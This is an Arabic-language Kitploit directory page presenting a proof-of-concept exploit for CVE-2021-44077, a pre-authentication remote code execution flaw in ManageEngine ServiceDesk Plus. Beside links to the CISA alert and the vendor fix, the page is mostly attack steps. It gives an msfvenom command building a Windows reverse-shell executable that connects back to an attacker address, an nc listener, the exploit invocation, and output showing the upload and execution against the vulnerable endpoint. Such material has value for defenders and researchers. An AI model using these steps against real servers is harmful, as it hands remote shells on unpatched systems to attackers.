Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44077 — استغلال إثبات المفهوم لـ ManageEngine ServiceDesk Plus CVE-2021-44077 | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2021-44077
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

استغلال إثبات المفهوم لـ ManageEngine ServiceDesk Plus CVE-2021-44077

عرض المستودع
369منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44077

إثبات المفهوم لاستغلال CVE-2021-44077: PreAuth RCE في ManageEngine ServiceDesk Plus < 11306

بناءً على:

  • https://xz.aliyun.com/t/10631

نشرة CISA:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

الإصلاح (التحديث إلى الإصدار 11306 أو أحدث):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

تم الاختبار على ManageEngine ServiceDesk Plus Build 11303. تم تعطيل جميع برامج مكافحة الفيروسات.

الاستخدام

يقوم الاستغلال برفع ملف تنفيذي لنظام ويندوز إلى الهدف وتنفيذه.

لاستغلال الثغرة، قم أولاً بتوليد أي ملف تنفيذي. على سبيل المثال:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

قم بتثبيت ملف المتطلبات باستخدام pip install أو تأكد من تثبيت حزمة requests.

إذا كنت تحاول استقبال شل عكسية، قم بتشغيل المستمع أولاً، مثلاً:

root@kitploit:~
nc -l 4444

ثم قم بتشغيل سكريبت الاستغلال، مع تمرير وسيطي url و exe، مثلاً:

root@kitploit:~
python exploit.py http://<TARGET>:<PORT> <path_to_exe>

مثال على إخراج السكريبت:

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

ملاحظات الاستغلال

  • الثغرة تتيح لك رفع أي ملف إلى دليل التثبيت bin، بما في ذلك الملفات الموجودة مثل نصوص الدفعات. قد توجد طرق أخرى لاستدعاء الملف المرفوع.
  • رفع قشرة ويب مباشرة يبدو أنه ممنوع بواسطة مرشح.

إخلاء مسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس الغرض منه استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة